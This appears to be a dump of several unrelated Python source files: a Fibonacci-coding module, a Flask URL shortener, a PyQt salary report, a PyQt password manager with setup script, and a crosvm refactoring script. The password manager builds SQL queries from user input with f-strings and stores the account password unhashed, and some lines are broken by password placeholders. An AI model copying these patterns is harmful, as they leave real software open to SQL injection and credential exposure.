return fromzeck((negazeck if nega else zeck)(n), nega=nega)
def str_fromint(n, nega=False):
"""
Construct a string of bits from the Zeckendorf representation of n.
:param n: an integer.
:param nega: whether to use the nega-Zeckendorf representation in
lieu of the regular one. Negative values of n are only allowed
in this case.
:type n: int
:type nega: bool
:return: the string of bits.
:rtype: str
"""
return str_fromzeck((negazeck if nega else zeck)(n), nega=nega)
def fibcode_fromint(n, nega=False):
"""
Return the Fibonacci code word corresponding to a certain positive
integer.
A Fibonacci code word is the bitstring of a Zeckendorf
representation, but reversed and with an extra "1" on the end. The
Fibonacci code is a variable-length Huffman code where "11" appears
at the end of a word and nowhere else.
:param n: an integer.
:param nega: whether to generate a nega-Fibonacci code word instead
of a regular one. Negative values of n are only allowed in this
case.
:type n: int
:type nega: bool
:return: the Fibonacci code word.
:rtype: str
"""
if n == 0:
raise ValueError("0 cannot be converted to a Fibonacci code word")
return fibcode_fromzeck((negazeck if nega else zeck)(n), nega=nega)
def toiter(binary):
"""
Iterate over the bits of a binary number from right to left.
:param binary: a binary number.
:type binary: int
:return: an iterator of True and False values.
:rtype: Iterator[bool]
"""
while binary > 0:
yield bool(binary % 2)
binary >>= 1
def tozeck(binary, nega=False):
"""
Iterate over the Fibonacci numbers F_(i+2) for which the ith bit
from the right of a binary number is 1.
:param binary: a binary number.
:param nega: whether to return a nega-Zeckendorf representation
instead of a regular one.
:type binary: int
:type nega: bool
:return: a stream of Fibonacci numbers from largest to smallest,
such as may be generated by zeckendorf.base.zeck().
:rtype: Iterator[int]
"""
if nega:
fibs = _negafibs()
next(fibs) # ignore 0 and start with 1, -1, 2, ...
else:
fibs = _fibs()
next(fibs), next(fibs) # ignore 0, 1 and start with 1, 2, ...
return reversed([fib for bit, fib in zip(toiter(binary), fibs) if bit])
def str_tozeck(bitstr, nega=False):
"""
Iterate over the Fibonacci numbers F_(i+2) for which the ith bit
from the right of the string of bits is 1.
:param bitstr: a string of bits.
:param nega: whether to return a nega-Zeckendorf representation
instead of a regular one.
:type bitstr: str
:type nega: bool
:return: a stream of Fibonacci numbers from largest to smallest,
such as may be generated by zeckendorf.base.zeck().
:rtype: Iterator[int]
"""
return tozeck(int(bitstr, base=2), nega=nega)
def fibcode_tozeck(codeword, nega=False):
"""
Iterate over the Zeckendorf representation corresponding to a
particular Fibonacci code word.
:param codeword: a Fibonacci code word.
:param nega: whether to take in a nega-Fibonacci code word instead
of a regular one.
:type codeword: str
:type nega: bool
:return: a stream of Fibonacci numbers from largest to smallest,
such as may be generated by zeckendorf.base.zeck().
:rtype: Iterator[int]
"""
return tozeck(int(codeword[-2::-1], base=2), nega=nega)
def toint(binary, nega=False):
"""
Interpret a binary number as a Zeckendorf representation of an
integer, and return that integer.
:param binary: a binary number.
:param nega: whether to interpret the binary number as a
nega-Zeckendorf representation instead of a regular one.
:type binary: int
:type nega: bool
:return: the integer.
:rtype: int
"""
return sum(tozeck(binary, nega=nega))
def str_toint(bitstr, nega=False):
"""
Interpret a string of bits as a Zeckendorf representation of an
integer, and return that integer.
:param bitstr: a string of bits.
:param nega: whether to interpret the string of bits as a
nega-Zeckendorf representation instead of a regular one.
:type bitstr: str
:type nega: bool
:return: the integer.
:rtype: int
"""
return sum(str_tozeck(bitstr, nega=nega))
def fibcode_toint(codeword, nega=False):
"""
Convert a Fibonacci code word to the integer it represents.
:param codeword: a Fibonacci code word.
:param nega: whether to take in a nega-Fibonacci code word instead
of a regular one.
:type codeword: str
:type nega: bool
:return: the integer.
:rtype: int
"""
return sum(fibcode_tozeck(codeword, nega=nega))
if __name__ == '__main__':
# example: print bitstrings for Zeckendorf representations from 0-99
[(print(n, '=>', str_fromint(n))) for n in range(100)]
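    # Additional sketch (not part of the original module): a round-trip sanity
    # check using only functions defined above.
    for n in range(1, 50):
        assert str_toint(str_fromint(n)) == n
        assert fibcode_toint(fibcode_fromint(n)) == n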
``` |
{
"source": "0xfr0ntier/shortify-flask",
"score": 3
} |
#### File: shortner_api/common/shortener.py
```python
import requests
from shortner_api.common.utils import generate_slug
from shortner_api.common.db import collec
API_KEY = "TINYURL API KEY"
def get_links() -> list:
lst = []
for doc in collec.find():
doc.pop('_id')
lst.append(doc)
return lst
def shorten_link(link: str) -> str:
req_url = f'https://api.tinyurl.com/create?api_token={API_KEY}'
req_body = {
'url': link,
'domain': 'tiny.one'
}
req = requests.post(req_url, req_body)
res = req.json()
return res['data']['tiny_url']
def shorten_links(args: dict) -> dict:
shortened_links = {}
slug = ''
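# Keep drawing random slugs until one is not already in the collection;
# the walrus assignment below leaves the final unique candidate in `slug`.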
while collec.find_one({'slug': (slug := generate_slug())}):
pass
shortened_links['slug'] = slug
shortened_links['web'] = shorten_link(args['web'])
shortened_links['ios'] = {
'primary': shorten_link(args['ios']),
'fallback': args['ios']
}
shortened_links['android'] = {
'primary': shorten_link(args['android']),
'fallback': args['android']
}
return shortened_links
def update_links(args: dict) -> dict:
doc = collec.find_one({'slug': args.pop('slug')})
for key, value in args.items():
if value:
doc[key] = shorten_link(value) if key == 'web' else {
'primary': shorten_link(value),
'fallback': value
}
return doc
```
#### File: shortner_api/parsers/parsers.py
```python
from flask_restful import reqparse
def non_empty_string(s):
if not s:
raise ValueError("Must not be empty string")
return s
# POST parser
post_args_parser = reqparse.RequestParser()
post_args_parser.add_argument('ios', required=True, nullable=False,
type=non_empty_string)
post_args_parser.add_argument('android', required=True,
nullable=False, type=non_empty_string)
post_args_parser.add_argument('web', required=True, nullable=False,
type=non_empty_string)
# PUT parser
put_args_parser = reqparse.RequestParser()
put_args_parser.add_argument(
'slug', required=True, nullable=False, type=non_empty_string)
put_args_parser.add_argument('ios', type=non_empty_string)
put_args_parser.add_argument('android', type=non_empty_string)
put_args_parser.add_argument('web', type=non_empty_string)
``` |
{
"source": "0xGhazy/ElReda-Mall",
"score": 3
} |
#### File: 0xGhazy/ElReda-Mall/sallary_report.py
```python
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5 import QtWidgets, uic
import os
os.chdir(os.path.dirname(__file__))
with open("data center\hours.txt", "r") as obj:
_HOURS_ = int(obj.read())
class SallaryReport(QtWidgets.QWidget):
"""a class that create a new window for reporting the net sallary for the employee """
def __init__(self: "SallaryReport",
name: str, sallary: float,
rewards: float = 0,
addational: float = 0,
regularity_value: float = 0,
movements_value: float = 0,
delay_hours: int = 0,
absence_days: int = 0,
borrow_value: float = 0,
deduction_value: float = 0,
other_ded: float = 0,
services_value: float = 0
) -> None:
super(QtWidgets.QWidget, self).__init__()
uic.loadUi(r"design\report_interface.ui", self)
self.show()
# handling empty records
if rewards == "":
rewards = 0
if addational == "":
addational = 0
if regularity_value == "":
regularity_value = 0
if delay_hours == "":
delay_hours = 0
if absence_days == "":
absence_days = 0
if borrow_value == "":
borrow_value = 0
if deduction_value == "":
deduction_value = 0
if services_value == "":
services_value = 0
# set values to the lbl in the window
self.employee_name_lbl.setText(name)
self.employee_sallary_lbl.setText(sallary)
self.employee_rewards_lbl.setText(str(rewards))
self.add_sallary_lbl.setText(str(addational))
self.employee_regularity_lbl.setText(str(regularity_value))
self.movements_lbl.setText(str(movements_value))
total_employee_rights = float(sallary) + float(rewards) + float(addational) + float(regularity_value) + float(movements_value)
self.total_eployee_rights.setText(str(total_employee_rights))
self.employee_delay_lbl.setText(str(delay_hours))
self.employee_absence_lbl.setText(str(absence_days))
self.employee_borrow_lbl.setText(str(borrow_value))
self.employee_deduction_lbl.setText(str(deduction_value))
self.other_de_lbl.setText(str(other_ded))
self.employee_services_lbl.setText(str(services_value))
# some important calculations for the report (uses the module-level _HOURS_ constant)
pay_per_day = (float(sallary) / 30)
pay_per_hour = pay_per_day / _HOURS_
get_delay = pay_per_hour * int(delay_hours)
get_absence = pay_per_day * int(absence_days)
get_borrow = float(borrow_value)
get_deduction = float(deduction_value)
get_service = float(services_value)
employee_loan = get_delay + get_absence + get_borrow + get_deduction + get_service + float(other_ded)
self.total_employee_loan_lbl.setText(str("{:.2f}".format(employee_loan)))
# formatting the net salary and displaying it :)
net_sallary = (float(total_employee_rights)) - float(employee_loan)
self.employee_net_sallary.setText(str("{:.2f}".format(net_sallary)))
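# Worked example (hypothetical figures, not from the original): with sallary = 3000,
# _HOURS_ = 8, delay_hours = 2, absence_days = 1 and no other deductions:
# pay_per_day = 3000 / 30 = 100, pay_per_hour = 100 / 8 = 12.5,
# employee_loan = 2 * 12.5 + 1 * 100 = 125, so the net salary is 3000 - 125 = 2875.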
``` |
{
"source": "0xGhazy/PyPass-Project",
"score": 3
} |
#### File: PyPass-Project/cores/css_parser.py
```python
def parssing_css(theme_name) -> dict:
# [+] Reading The CSS file
content = []
try:
with open(theme_name, "r") as css_file:
content = css_file.readlines()
except Exception as error:
print(f"[-] Error message: \n{error}")
# [+] Data cleaning
separator = "/*###################### I'm separator :) ######################*/"
css_data = [line.strip() for line in content]
temp = ""
final_css = []
for word in css_data:
if word != separator:
temp += word
else:
final_css.append(temp)
temp = ""
# [+] Final data
parsed_data = {
"self" : final_css[0],
"tabWidget" : final_css[1],
"listWidget" : final_css[2],
"display_qr_btn" : final_css[3],
"decrypt_and_copy_password" : final_css[4],
"getting_account_id" : final_css[5],
"select_by_id" : final_css[6],
"listWidget_edit_accounts" : final_css[7],
"edit_account_platform" : final_css[8],
"edit_account_email" : final_css[9],
"edit_account_password" : final_css[10],
"show_password" : final_css[11],
"insert_account_data" : final_css[12],
"update_account_data" : final_css[13],
"delete_account_data" : final_css[14]
}
return parsed_data
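# Note on the expected theme file layout (inferred from the parsing above, not
# documented in the original): each theme .css file holds 15 style blocks, in the
# fixed order of the keys above, separated by the exact `separator` line.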
```
#### File: PyPass-Project/cores/password.py
```python
import random
import string
class Password:
"""
Password class takes care of:
- Checking password strength.
- Generating a strong random password containing lower/upper-case letters
and digits; the generated password is 16 characters long.
"""
def __init__(self):
self._password_strength = 0
self._max_strength = 5  # Covers all five checks below (length, lower, upper, symbols, numbers)
self._random_password = ""
def check_length(self: "Password", password: str) -> None:
if len(password) >= 8:
self._password_strength += 1
def check_lower(self: "Password", password: str) -> None:
for letter in password:
if letter in string.ascii_lowercase:
self._password_strength += 1
break
def check_upper(self: "Password", password: str) -> None:
for letter in password:
if letter in string.ascii_uppercase:
self._password_strength += 1
break
def check_symbols(self: "Password", password: str) -> None:
symbols = string.punctuation
for letter in password:
if letter in symbols:
self._password_strength += 1
break
def check_numbers(self: "Password", password: str) -> None:
for letter in password:
if letter.isdigit():
self._password_strength += 1
break
## Get password strength score (x of 5)
def check_strength(self: "Password", password: str) -> int:
self.check_length(password)
self.check_lower(password)
self.check_numbers(password)
self.check_symbols(password)
self.check_upper(password)
return self._password_strength
def generate_password(self: "Password") -> str:
self._random_password = ""
for _ in range(0, 16):
self._random_password += random.choice(
string.ascii_uppercase +
string.ascii_lowercase +
string.digits)
return self._random_password
if __name__ == '__main__':
x = Password()
print("[+] Generate random password")
x.generate_password()
print("Random password: ", x._random_password)
print("\n\n[+] Check password strength")
x.check_strength("Hello_World 2022")
print(x._password_strength)
```
#### File: 0xGhazy/PyPass-Project/PyPass.pyw
```python
import os
import sys
from pathlib import Path
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5 import QtWidgets, uic, QtGui
from PyQt5.QtWidgets import QLineEdit, QMessageBox, QMenu, QAction, QFileDialog
from cores.logsystem import LogSystem
from cores.encryption import Security
from cores.database_api import Database
from cores.QR_handler import QRHandler
from cores.password import Password
from cores.login_screen_handler import LoginScreen
from cores.css_parser import parssing_css
import pyperclip
BASE_DIR = Path(__file__).resolve().parent
main_UI = BASE_DIR / "ui" / "mainUI.ui"
# change this when you want to add a new platform; append it in lower case :)
SUPPORTED_PLATFORMS = ["facebook", "codeforces", "github",
"gmail", "hackerranck", "medium",
"outlook", "quora", "twitter",
"udacity", "udemy", "university", "wordpress"]
class PyPass(QtWidgets.QMainWindow):
def __init__(self) -> None:
super(PyPass, self).__init__()
os.chdir(os.path.dirname(__file__))
# loading .ui design file.
uic.loadUi(main_UI, self)
# hide tabwidget
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.tabBar().setVisible(False)
self.app_path = Path(__file__).resolve().parent
# Application Data
self.database_obj = Database()
self.security_obj = Security()
self.log_obj = LogSystem()
self.signin_window = LoginScreen()
self.password_obj = Password()
self.is_clicked = True # if show password is clicked
## calling the sign in window/Dialog
if self.signin_window.exec_() == QtWidgets.QDialog.Accepted:
# Starter methods
self.display_accounts_list()
self.display_accounts_to_edit()
self.handleButtons()
self.display_menus()
# show our application
self.show()
def handleButtons(self) -> None:
""" Handling all buttons in the application """
self.home_nav.clicked.connect(self.home_page)
self.accounts_nav.clicked.connect(self.accounts_page)
self.edit_nav.clicked.connect(self.edit_accounts_page)
self.settings_nav.clicked.connect(self.setting_page)
self.decrypt_and_copy_password.clicked.connect(self.copy_plaintext_password)
self.select_by_id.clicked.connect(self.select_account_id)
self.insert_account_data.clicked.connect(self.add_new_account)
self.update_account_data.clicked.connect(self.edit_account)
self.delete_account_data.clicked.connect(self.delete_account)
self.show_password.clicked.connect(self.is_plain)
self.display_qr_btn.clicked.connect(self.show_qr_image)
self.import_key_btn.clicked.connect(self.import_key)
self.export_key_btn.clicked.connect(self.export_key)
def display_menus(self):
menubar = self.menuBar()
# [+] Creating Edit menu
edit_menu = menubar.addMenu('&Edit')
# [+] `Change theme` submenu
theme_menu = QMenu('Change Theme', self)
self.theme0 = QAction('0- Default Theme', self)
self.theme1 = QAction('1- GitHub Dark', self)
self.theme2 = QAction('2- GitHub Light', self)
self.theme3 = QAction('3- Black Gold', self)
theme_menu.addAction(self.theme0)
theme_menu.addAction(self.theme1)
theme_menu.addAction(self.theme2)
theme_menu.addAction(self.theme3)
edit_menu.addMenu(theme_menu)
# [+] Handling change theme actions/invocations
self.theme0.triggered.connect(lambda i = None : self.change_theme("default.css"))
self.theme1.triggered.connect(lambda i = None : self.change_theme("Github-dark.css"))
self.theme2.triggered.connect(lambda i = None : self.change_theme("Github-light.css"))
self.theme3.triggered.connect(lambda i = None : self.change_theme("Black-Gold.css"))
def change_theme(self, theme_name):
themes_path = self.app_path / "ui" / "themes" / theme_name
css_style = parssing_css(themes_path)
# Setting new theme data.
self.setStyleSheet(css_style["self"])
self.tabWidget.setStyleSheet(css_style["tabWidget"])
self.listWidget.setStyleSheet(css_style["listWidget"])
self.display_qr_btn.setStyleSheet(css_style["display_qr_btn"])
self.decrypt_and_copy_password.setStyleSheet(css_style["decrypt_and_copy_password"])
self.getting_account_id.setStyleSheet(css_style["getting_account_id"])
self.select_by_id.setStyleSheet(css_style["select_by_id"])
self.listWidget_edit_accounts.setStyleSheet(css_style["listWidget_edit_accounts"])
self.edit_account_platform.setStyleSheet(css_style["edit_account_platform"])
self.edit_account_email.setStyleSheet(css_style["edit_account_email"])
self.edit_account_password.setStyleSheet(css_style["edit_account_password"])
self.show_password.setStyleSheet(css_style["show_password"])
self.insert_account_data.setStyleSheet(css_style["insert_account_data"])
self.update_account_data.setStyleSheet(css_style["update_account_data"])
self.delete_account_data.setStyleSheet(css_style["delete_account_data"])
############################
## Handling right buttons ##
############################
def home_page(self) -> None:
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.setCurrentIndex(0)
def accounts_page(self) -> None:
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.setCurrentIndex(1)
# refresh the list in the next click
self.listWidget.clear()
self.listWidget.update()
self.display_accounts_list()
def edit_accounts_page(self) -> None:
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.setCurrentIndex(2)
# refresh the list in the next click
self.listWidget_edit_accounts.clear()
self.listWidget_edit_accounts.update()
self.display_accounts_to_edit()
def setting_page(self) -> None:
self.tabWidgets = self.findChild(QtWidgets.QTabWidget, 'tabWidget')
self.tabWidgets.setCurrentIndex(3)
# Display the currant key path
key_path = self.app_path / "cores" / "security_key.key"
self.enc_key_edit.setText(f" {str(key_path)}")
#######################################
## Handling buttons in accounts page ##
#######################################
def copy_plaintext_password(self) -> None:
"""Copy plain text password to clipboard after decrypting it."""
selected_account = self.listWidget.currentItem().text().split(" :: ")
accound_id = int(selected_account[0])
db_data = list(self.database_obj.db_query(f"SELECT * FROM Accounts WHERE id = {accound_id};"))
plaintext_password = self.security_obj.decrypt(db_data[0][3].encode())
pyperclip.copy(plaintext_password)
# create log event in /cores/Logs.txt
self.log_obj.write_into_log("+", f"({selected_account}) has been moved to the clipboard")
self.statusBar().showMessage("[+] Copy the selected account.")
return plaintext_password
def show_qr_image(self):
# [+] Generate the photo for selected account
self.qr_handle = QRHandler()
self.plain_password = <PASSWORD>()
self.qr_handle.generate_qr(self.plain_password, "photo.png")
# [+] Display the image
# Reading qr photo in Pixmap
self.pixmap = QPixmap("photo.png")
# Append the pixmap to QLable
self.qr_image_obj.setPixmap(self.pixmap)
self.qr_image_obj.setScaledContents(True)
# [+] Remove the image from the path.
os.remove("photo.png")
###################################
## Handling buttons in edit page ##
###################################
def select_account_id(self) -> None: # 11
"""return the selected account data and put them into edit line"""
account_id = self.getting_account_id.text()
try:
response = list(self.database_obj.db_query(f"SELECT * FROM Accounts WHERE id={account_id}"))
# display result on line edit
self.edit_account_platform.setText(response[0][1])
self.edit_account_email.setText(response[0][2])
self.edit_account_password.setText(self.security_obj.decrypt(response[0][3].encode()))
# create log event with the selected account information, without the password
self.log_obj.write_into_log("+", f"({response[0][0:-1]}) Was selected!")
except Exception as error_message:
print(error_message)
def add_new_account(self) -> None:
"""adding new account to database"""
plat_name = self.edit_account_platform.text()
account = self.edit_account_email.text()
plain_password = self.edit_account_password.text()
# Check for the password strength
if (self.password_obj.check_strength(plain_password) < 3):
generated_password = self.password_obj.generate_password()
msgBox = QMessageBox()
msgBox.setIcon(QMessageBox.Information)
msgBox.setWindowTitle("Password Tip!")
msgBox.setText(f"""
Your password seems to be a weak one :(
Let me help you with a powerful random password\n\n
Your password will be: {<PASSWORD>}
""")
msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)
user_response = msgBox.exec()
if user_response == QMessageBox.Ok:
plain_password = <PASSWORD>
# Encrypt password
encrypted_password = self.security_obj.encrypt(plain_password)
self.database_obj.db_query(
f"INSERT INTO Accounts (ApplicationName, Account, EncryptedPassword) VALUES ('{plat_name}', '{account}', '{encrypted_password}');")
self.statusBar().showMessage("[+] A new account has been added to database.")
self.log_obj.write_into_log("+", f"(('{plat_name}', '{account}', '{encrypted_password}')) account was added!")
self.edit_accounts_page()
def edit_account(self) -> None:
"""update selected account on database"""
plat_name = self.edit_account_platform.text()
account = self.edit_account_email.text()
plain_password = self.edit_account_password.text()
encrypted_password = self.security_obj.encrypt(plain_password)
id = int(self.getting_account_id.text())
self.database_obj.db_query(
f"UPDATE Accounts SET ApplicationName = '{plat_name}', Account = '{account}', EncryptedPassword = '{<PASSWORD>}' WHERE id = {id};")
self.log_obj.write_into_log("+", f"(('{plat_name}', '{account}', '{encrypted_password}')) account was updated!")
self.statusBar().showMessage("[+] The account has been updated successfully!")
self.edit_accounts_page()
def is_plain(self):
if self.is_clicked:
self.edit_account_password.setEchoMode(QLineEdit.EchoMode.Normal)
self.show_password.setText("Hide")
self.is_clicked = False
elif self.is_clicked == False:
self.edit_account_password.setEchoMode(QLineEdit.EchoMode.Password)
self.show_password.setText("Show")
self.is_clicked = True
def delete_account(self) -> None:
"""delete selected account from fatabase"""
id = int(self.getting_account_id.text())
self.database_obj.db_query(f"DELETE FROM Accounts WHERE id = {id};")
self.log_obj.write_into_log("+", f"({id}) account was deleted!")
self.statusBar().showMessage("[+] The account has been removed successfully!")
self.edit_accounts_page()
######################################
## Handling Methods in setting page ##
######################################
def import_key(self):
key_file, _ = QFileDialog.getOpenFileName(self, 'Open file', '', 'All Files (*.*)')
if len(key_file) < 1:
pass
else:
# Read the key.
with open(key_file, "rb") as k_file:
content = k_file.read()
# Write The new key.
key_path = self.app_path / "cores" / "security_key.key"
with open(key_path, "wb") as k_file:
k_file.write(content)
self.log_obj.write_into_log("+", f"A new key has been imported")
self.statusBar().showMessage("[+] Your new key is imported successfully!")
def export_key(self):
exported_key_path, _ = QFileDialog.getSaveFileName(self, "Save File", "security_key.key")
key_file = self.app_path / "cores" / "security_key.key"
# Read the key.
with open(key_file, "rb") as k_file:
content = k_file.read()
# Write The new key.
with open(exported_key_path, "wb") as k_file:
k_file.write(content)
self.log_obj.write_into_log("+", f"The key is exported at {exported_key_path}")
self.statusBar().showMessage(f"[+] Your key is Exported successfully! @ {exported_key_path}")
######################
## Separate Methods ##
######################
def reading_database_records(self) -> list:
"""retrieve all database accounts
Returns:
list: list of database accounts
"""
result = self.database_obj.db_query("SELECT * FROM Accounts")
return list(result)
def display_accounts_list(self) -> None:
"""append all database accounts to QListWidget on accounts page."""
icons_path = os.path.join(os.path.dirname(__file__), "ui", "icons", "socialIcons")
data = self.reading_database_records()
record_index = 0
for row in data:
icon = QtGui.QIcon(os.path.join(icons_path, f"{row[1].lower()}.png"))
if f"{row[1].lower()}" in SUPPORTED_PLATFORMS:
item = QtWidgets.QListWidgetItem(icon, f"{row[0]} :: {row[2]}")
self.listWidget.addItem(item)
else:
icon = QtGui.QIcon(os.path.join(icons_path, f"user.png"))
item = QtWidgets.QListWidgetItem(icon, f"{row[0]} :: {row[1]} :: {row[2]}")
self.listWidget.addItem(item)
record_index += 1
def display_accounts_to_edit(self) -> None:
"""append all database accounts to QListWidget on edit page."""
self.listWidget_edit_accounts.update()
icons_path = os.path.join(os.path.dirname(__file__), "ui", "icons", "socialIcons")
data = self.reading_database_records()
record_index = 0
for row in data:
icon = QtGui.QIcon(os.path.join(icons_path, f"{row[1].lower()}.png"))
if f"{row[1].lower()}" in SUPPORTED_PLATFORMS:
item = QtWidgets.QListWidgetItem(icon, f"{row[0]} :: {row[2]}")
self.listWidget_edit_accounts.addItem(item)
self.listWidget_edit_accounts.repaint()
else:
icon = QtGui.QIcon(os.path.join(icons_path, f"user.png"))
item = QtWidgets.QListWidgetItem(icon, f"{row[0]} ::{row[1]} :: {row[2]}")
self.listWidget_edit_accounts.addItem(item)
self.listWidget_edit_accounts.update()
record_index += 1
if __name__ == "__main__":
# calling our application :)
app = QtWidgets.QApplication(sys.argv)
window = PyPass()
app.exec_()
```
#### File: 0xGhazy/PyPass-Project/setup.py
```python
import os
import sys
import getpass
from cores.database_api import Database
from platform import platform
def check_python_version():
# check if python 3 is installed
if sys.version_info[0] != 3:
print("[-] Python 3.x is required.")
return 0
else:
return 1
def install_reqs():
# install requirements from req.txt
if platform().startswith('Windows'):  # platform() returns e.g. 'Windows-10-...', not just 'Windows'
os.system("pip install -r req.txt")
os.system("cls")
else:
os.system("pip3 install -r req.txt")
os.system("clear")
print("\n Requirements installed successfully \n")
def user_account_setup():
# create database object
db_obj = Database()
# use existing username from os as Account Username
user_name = os.getlogin()
print("Your user name is: " + user_name)
# allow user to create a unique Account Password
print("Your Account Password: ", end = "")
user_pass = <PASSWORD>()
db_obj.db_query(f"INSERT INTO Users (UserName, UserPass) VALUES ('{user_name}', '{user_pass}');")
print("User Account Created!")
if __name__ == '__main__':
# change cwd to the setup.py script directory
os.chdir(os.path.dirname(__file__))
if check_python_version():
try:
install_reqs()
user_account_setup()
except Exception as error_message:
print(f"[-] Error Massage:\n{error_message}\n")
else:
exit()
``` |
{
"source": "0xgpapad/Ax",
"score": 2
} |
#### File: storage/json_store/save.py
```python
import json
from typing import Any, Callable, Type, Dict
from ax.core.experiment import Experiment
from ax.storage.json_store.encoder import object_to_json
def save_experiment(
experiment: Experiment,
filepath: str,
encoder_registry: Dict[Type, Callable[[Any], Dict[str, Any]]],
class_encoder_registry: Dict[Type, Callable[[Any], Dict[str, Any]]],
) -> None:
"""Save experiment to file.
1) Convert Ax experiment to JSON-serializable dictionary.
2) Write to file.
"""
if not isinstance(experiment, Experiment):
raise ValueError("Can only save instances of Experiment")
if not filepath.endswith(".json"):
raise ValueError("Filepath must end in .json")
json_experiment = object_to_json(
experiment,
encoder_registry=encoder_registry,
class_encoder_registry=class_encoder_registry,
)
with open(filepath, "w+") as file:
file.write(json.dumps(json_experiment))
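# Illustrative usage sketch. The registry names below are assumptions about Ax's
# default JSON-store registries and may differ between Ax versions:
# from ax.storage.json_store.registry import (
#     CORE_CLASS_ENCODER_REGISTRY, CORE_ENCODER_REGISTRY)
# save_experiment(experiment, "experiment.json",
#                 encoder_registry=CORE_ENCODER_REGISTRY,
#                 class_encoder_registry=CORE_CLASS_ENCODER_REGISTRY)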
```
#### File: utils/testing/mock.py
```python
from contextlib import ExitStack, contextmanager
from functools import wraps
from typing import Callable, Generator
from unittest import mock
from scipy.optimize import minimize
@contextmanager
def fast_botorch_optimize_context_manager() -> Generator[None, None, None]:
"""A context manager to force botorch to speed up optimization. Currently, the
primary tactic is to force the underlying scipy methods to stop after just one
iteration.
"""
def one_iteration_minimize(*args, **kwargs):
if kwargs["options"] is None:
kwargs["options"] = {}
kwargs["options"]["maxiter"] = 1
return minimize(*args, **kwargs)
with ExitStack() as es:
mock_generation = es.enter_context(
mock.patch(
"botorch.generation.gen.minimize",
wraps=one_iteration_minimize,
)
)
mock_fit = es.enter_context(
mock.patch(
"botorch.optim.fit.minimize",
wraps=one_iteration_minimize,
)
)
yield
if mock_generation.call_count < 1 and mock_fit.call_count < 1:
raise AssertionError(
"No mocks were called in the context manager. Please remove unused "
"fast_botorch_optimize_context_manager()."
)
def fast_botorch_optimize(f: Callable) -> Callable:
"""Wraps f in the fast_botorch_optimize_context_manager for use as a decorator."""
@wraps(f)
def inner(*args, **kwargs):
with fast_botorch_optimize_context_manager():
return f(*args, **kwargs)
return inner
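# Illustrative usage sketch (the test method name is hypothetical): any
# scipy-based BoTorch fit or candidate generation inside the decorated test
# runs minimize() with maxiter=1, keeping the test fast.
# @fast_botorch_optimize
# def test_model_fit(self):
#     ...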
``` |
{
"source": "0xgpapad/crosvm",
"score": 3
} |
#### File: tools/contrib/cargo_refactor.py
```python
from contextlib import contextmanager
from pathlib import Path
import os
import re
import shutil
import subprocess
from typing import Callable, List, Tuple, Union
SearchPattern = Union[str, re.Pattern[str]]
Replacement = Union[str, Callable[[re.Match[str]], str]]
def append_to_file(file_path: Path, appendix: str):
contents = file_path.read_text()
file_path.write_text(contents.rstrip() + "\n" + appendix + "\n")
def replace_in_file(file_path: Path, search: SearchPattern, replace: Replacement):
if not file_path.exists():
print(f"WARNING: Does not exist {file_path}")
return
if isinstance(search, str):
search = re.escape(search)
contents = file_path.read_text()
(contents, count) = re.subn(search, replace, contents)
if count > 0:
print(f"replacing '{search}' with '{replace}' in {file_path}")
file_path.write_text(contents)
def replace_in_files(glob: str, replacements: List[Tuple[SearchPattern, Replacement]]):
for file in Path().glob(glob):
for (search, replace) in replacements:
replace_in_file(file, search, replace)
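# Illustrative usage sketch (the glob and the replacement pair are hypothetical):
# replace_in_files("**/*.rs", [("old_crate::", "new_crate::")])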
def replace_path_in_all_cargo_toml(old_path: Path, new_path: Path):
"Replace path in all cargo.toml files, accounting for relative paths."
for toml in Path().glob("**/Cargo.toml"):
crate_dir = toml.parent
old_rel = os.path.relpath(old_path, crate_dir)
new_rel = os.path.relpath(new_path, crate_dir)
replace_in_file(toml, re.escape(f'path = "{old_rel}"'), f'path = "{new_rel}"')
def update_path_deps(toml: Path, from_path: Path, to_path: Path):
"Update path deps in toml file after moving it"
contents = toml.read_text()
for old_dep in re.findall('{ path = "([^"]+)"', contents):
new_dep = os.path.relpath((from_path / old_dep).resolve(), to_path)
contents = contents.replace(f'path = "{old_dep}"', f'path = "{new_dep}"')
toml.write_text(contents)
def move_crate(from_path: Path, to_path: Path):
"Move crate and update dependencies"
print(f"{from_path} -> {to_path}")
if to_path.exists():
shutil.rmtree(to_path)
shutil.copytree(str(from_path), str(to_path))
update_path_deps(to_path / "Cargo.toml", from_path, to_path)
replace_in_files("**/*/Cargo.toml", [(str(from_path), str(to_path))])
replace_in_file(Path("Cargo.toml"), str(from_path), str(to_path))
def update_workspace_members():
members: list[str] = []
members.append("members = [")
for toml in sorted(Path().glob("*/Cargo.toml")):
members.append(f' "{toml.parent}",')
members.append(' "third_party/vmm_vhost",')
members.append("]")
replace_in_file(Path("Cargo.toml"), re.compile(r"members = \[[^\]]+\]"), "\n".join(members))
exclude: list[str] = []
exclude.append("exclude = [")
for toml in sorted(Path().glob("common/*/Cargo.toml")):
exclude.append(f' "{toml.parent}",')
exclude.append("]")
replace_in_file(Path("Cargo.toml"), re.compile(r"exclude = \[[^\]]+\]"), "\n".join(exclude))
@contextmanager
def chdir(path: Union[Path, str]):
origin = Path().absolute()
try:
os.chdir(path)
yield
finally:
os.chdir(origin)
def copy_crate_src_to_module(source: str, destination: str):
shutil.rmtree(destination, ignore_errors=True)
shutil.copytree(source, destination)
with chdir(destination):
Path("lib.rs").rename("mod.rs")
IMPORT = """pub mod unix;
#[cfg(windows)]
pub mod windows;
"""
BUILD_RS = """\
// Copyright 2022 The Chromium OS Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
fn main() {
cc::Build::new()
.file("src/windows/stdio_fileno.c")
.compile("stdio_fileno");
}
"""
def main():
os.chdir(Path(__file__).parent.parent.parent)
subprocess.check_call(["git", "checkout", "-f", "--", "base"])
# Move crates to base
move_crate(Path("common/win_util"), Path("win_util"))
copy_crate_src_to_module("common/win_sys_util/src", "base/src/windows")
Path("base/build.rs").write_text(BUILD_RS)
# Load the added module
replace_in_file(Path("base/src/lib.rs"), "pub mod unix;", IMPORT)
# Flatten all imports for easier replacements
subprocess.check_call(
